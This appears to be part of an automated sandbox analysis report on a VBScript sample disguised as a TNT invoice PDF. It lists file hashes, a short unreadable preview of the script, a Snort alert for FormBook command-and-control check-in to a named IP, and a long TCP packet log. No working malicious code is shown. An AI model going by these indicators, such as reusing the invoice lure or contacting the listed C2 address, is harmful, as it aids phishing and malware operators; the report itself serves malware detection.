Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	Unicode text, UTF-16, little-endian text, with very long lines (771), with CRLF line terminators
Entropy (8bit):	3.725435526548108
TrID:	Text - UTF-16 (LE) encoded (2002/1) 64.44% MP3 audio (1001/1) 32.22% Lumena CEL bitmap (63/63) 2.03% Corel Photo Paint (41/41) 1.32%
File name:	TNT Invoicing_pdf.vbs
File size:	110'068 bytes
MD5:	dc730ce99454b09b0cdb56ad864393a1
SHA1:	221a2f95154e2bce9723c5f19d6136984549f745
SHA256:	875354779fb810fdab20845476e3e312f030edf58dcc043b2ea8ac566d95fd9b
SHA512:	a4b57b5279c02c6d19f194aa7eb4eb340d56a9d81a465e6f10b4a066b22cec15e161456c74bf05b895667b9b172c2dbe92c7033acb360203eee14361529ee903
SSDEEP:	1536:/2ng9U1lBHFcJUJI+YZb5bJ9Gmgz/+rtfRDFqGb5uJZUU0tKl9CP8Z:/DU1DHFUGmgURDFBe0tKl9CP4
TLSH:	12B3AB1267FA1208F5F77B88A97611340B37BD9AA97DC64C05CC290D1FF3A848865BB7
File Content Preview:	......'.....c.o.n.s.t. .c.o.r.i.z.a. . . . . . . . . . .=. .0.....c.o.n.s.t. .k.A.c.t.i.o.n.D.e.l.e.t.e. . . . . . . .=. .1.....c.o.n.s.t. .k.A.c.t.i.o.n.L.i.s.t. . . . . . . . . .=. .2.....c.o.n.s.t. .a.t.e.n.s. . . . . . .=. .3.....c.o.n.s.t. .t.i.c.a.l

File Icon


Icon Hash:	68d69b8f86ab9a86

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/17/24-08:40:09.798456	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49709	80	192.168.2.6	216.40.34.41

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 17, 2024 08:39:17.677063942 CEST	49674	443	192.168.2.6	173.222.162.64
Apr 17, 2024 08:39:17.677170038 CEST	49673	443	192.168.2.6	173.222.162.64
Apr 17, 2024 08:39:18.020756960 CEST	49672	443	192.168.2.6	173.222.162.64
Apr 17, 2024 08:39:20.944897890 CEST	49699	443	192.168.2.6	104.21.84.67
Apr 17, 2024 08:39:20.944957972 CEST	443	49699	104.21.84.67	192.168.2.6
Apr 17, 2024 08:39:20.945039034 CEST	49699	443	192.168.2.6	104.21.84.67
Apr 17, 2024 08:39:20.960433960 CEST	49699	443	192.168.2.6	104.21.84.67
Apr 17, 2024 08:39:20.960484982 CEST	443	49699	104.21.84.67	192.168.2.6
Apr 17, 2024 08:39:21.184690952 CEST	443	49699	104.21.84.67	192.168.2.6
Apr 17, 2024 08:39:21.184777975 CEST	49699	443	192.168.2.6	104.21.84.67
Apr 17, 2024 08:39:21.255326033 CEST	49699	443	192.168.2.6	104.21.84.67
Apr 17, 2024 08:39:21.255368948 CEST	443	49699	104.21.84.67	192.168.2.6
Apr 17, 2024 08:39:21.255731106 CEST	443	49699	104.21.84.67	192.168.2.6
Apr 17, 2024 08:39:21.256155014 CEST	49699	443	192.168.2.6	104.21.84.67
Apr 17, 2024 08:39:21.258887053 CEST	49699	443	192.168.2.6	104.21.84.67
Apr 17, 2024 08:39:21.300122976 CEST	443	49699	104.21.84.67	192.168.2.6
Apr 17, 2024 08:39:21.641105890 CEST	443	49699	104.21.84.67	192.168.2.6
Apr 17, 2024 08:39:21.641154051 CEST	443	49699	104.21.84.67	192.168.2.6
Apr 17, 2024 08:39:21.641177893 CEST	49699	443	192.168.2.6	104.21.84.67
Apr 17, 2024 08:39:21.641207933 CEST	443	49699	104.21.84.67	192.168.2.6
Apr 17, 2024 08:39:21.641222000 CEST	49699	443	192.168.2.6	104.21.84.67
Apr 17, 2024 08:39:21.641244888 CEST	443	49699	104.21.84.67	192.168.2.6
Apr 17, 2024 08:39:21.641258001 CEST	49699	443	192.168.2.6	104.21.84.67
Apr 17, 2024 08:39:21.641263962 CEST	443	49699	104.21.84.67	192.168.2.6
Apr 17, 2024 08:39:21.641283989 CEST	49699	443	192.168.2.6	104.21.84.67
Apr 17, 2024 08:39:21.641298056 CEST	443	49699	104.21.84.67	192.168.2.6
Apr 17, 2024 08:39:21.641307116 CEST	49699	443	192.168.2.6	104.21.84.67
Apr 17, 2024 08:39:21.641311884 CEST	443	49699	104.21.84.67	192.168.2.6
Apr 17, 2024 08:39:21.641333103 CEST	49699	443	192.168.2.6	104.21.84.67
Apr 17, 2024 08:39:21.641357899 CEST	49699	443	192.168.2.6	104.21.84.67
Apr 17, 2024 08:39:21.641361952 CEST	443	49699	104.21.84.67	192.168.2.6
Apr 17, 2024 08:39:21.641424894 CEST	49699	443	192.168.2.6	104.21.84.67
Apr 17, 2024 08:39:21.687906027 CEST	443	49699	104.21.84.67	192.168.2.6
Apr 17, 2024 08:39:21.687984943 CEST	49699	443	192.168.2.6	104.21.84.67
Apr 17, 2024 08:39:21.688059092 CEST	443	49699	104.21.84.67	192.168.2.6
Apr 17, 2024 08:39:21.688201904 CEST	49699	443	192.168.2.6	104.21.84.67
Apr 17, 2024 08:39:21.688211918 CEST	443	49699	104.21.84.67	192.168.2.6
Apr 17, 2024 08:39:21.688308954 CEST	49699	443	192.168.2.6	104.21.84.67
Apr 17, 2024 08:39:21.688316107 CEST	443	49699	104.21.84.67	192.168.2.6
Apr 17, 2024 08:39:21.688455105 CEST	443	49699	104.21.84.67	192.168.2.6
Apr 17, 2024 08:39:21.688509941 CEST	49699	443	192.168.2.6	104.21.84.67
Apr 17, 2024 08:39:21.688678980 CEST	49699	443	192.168.2.6	104.21.84.67
Apr 17, 2024 08:39:21.688698053 CEST	443	49699	104.21.84.67	192.168.2.6
Apr 17, 2024 08:39:23.343767881 CEST	443	49698	173.222.162.64	192.168.2.6
Apr 17, 2024 08:39:23.343893051 CEST	49698	443	192.168.2.6	173.222.162.64
Apr 17, 2024 08:39:24.497138977 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:24.497189999 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.497256041 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:24.506387949 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:24.506417990 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.731134892 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.731214046 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:24.734546900 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:24.734561920 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.734822035 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.742829084 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:24.788124084 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.983681917 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.983737946 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.983762026 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.983781099 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:24.983793020 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.983818054 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.983834982 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:24.983850002 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.983874083 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.983886003 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:24.983901978 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.983937025 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:24.983943939 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.984283924 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.984313965 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.984328985 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:24.984337091 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.984354973 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.984375000 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:24.984383106 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.984424114 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:24.985107899 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.985184908 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.985212088 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.985222101 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:24.985232115 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.985280991 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:24.985285997 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.985986948 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.986011028 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.986027956 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:24.986037016 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.986068964 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.986078024 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:24.986085892 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.986131907 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:24.986136913 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.986911058 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.986936092 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.986958027 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:24.986960888 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.986972094 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.986998081 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:24.987643003 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.987663984 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.987684965 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.987689018 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:24.987701893 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.987728119 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:24.987729073 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.987752914 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.987773895 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:24.987782001 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.987826109 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:24.988612890 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.988698959 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.988719940 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.988739014 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:24.988745928 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.988784075 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:24.988790035 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.989568949 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:24.989624977 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:24.989634991 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.036336899 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.088294029 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.088361025 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.088368893 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.088381052 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.088421106 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.088787079 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.088841915 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.088871956 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.088922024 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.089694977 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.089756012 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.089771986 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.089822054 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.090600967 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.090650082 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.091347933 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.091398954 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.091609001 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.091655016 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.091706991 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.091759920 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.092758894 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.092809916 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.092848063 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.092896938 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.093534946 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.093580961 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.094093084 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.094144106 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.094249010 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.094302893 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.094980955 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.095036983 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.136372089 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.136440039 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.191958904 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.192126036 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.192296028 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.192351103 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.192913055 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.192970037 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.192996979 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.193068981 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.193850994 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.193907022 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.193911076 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.193926096 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.193965912 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.194665909 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.194717884 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.194828033 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.194881916 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.195658922 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.195739031 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.195768118 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.195782900 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.195797920 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.195826054 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.196620941 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.196654081 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.196666956 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.196672916 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.196696997 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.196716070 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.197427034 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.197488070 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.197506905 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.197561026 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.198474884 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.198529959 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.198535919 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.198549032 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.198599100 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.199290991 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.199342012 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.199357986 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.199429989 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.200229883 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.200279951 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.200318098 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.200371981 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.201133013 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.201186895 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.202222109 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.202253103 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.202279091 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.202282906 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.202321053 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.204030037 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.204050064 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.204113007 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.204119921 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.204159021 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.206522942 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.206558943 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.206633091 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.206641912 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.206679106 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.208308935 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.208323956 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.208394051 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.208403111 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.208434105 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.209784031 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.209799051 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.209844112 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.209852934 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.209886074 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.209899902 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.212198019 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.212213993 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.212256908 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.212266922 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.212286949 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.212315083 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.214015007 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.214030981 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.214077950 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.214087009 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.214124918 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.215812922 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.215830088 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.215861082 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.215867043 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.215909004 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.215930939 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.223031998 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.223084927 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.240658045 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.240679026 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.240784883 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.240786076 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.240825891 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.240869999 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.297074080 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.297095060 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.297173023 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.297228098 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.297281981 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.298789978 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.298804998 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.298866987 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.298877001 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.298917055 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.298938036 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.300527096 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.300544024 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.300609112 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.300620079 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.300661087 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.302304983 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.302320004 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.302371979 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.302382946 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.302448034 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.302448034 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.304533005 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.304548979 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.304588079 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.304611921 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.304630995 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.304652929 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.306247950 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.306262970 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.306323051 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.306333065 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.306372881 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.308072090 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.308087111 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.308157921 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.308166981 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.308176041 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.308202982 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.309822083 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.309838057 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.309880972 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.309890985 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.309914112 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.309937000 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.312000036 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.312020063 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.312067032 CEST	49700	443	192.168.2.6	172.67.215.45
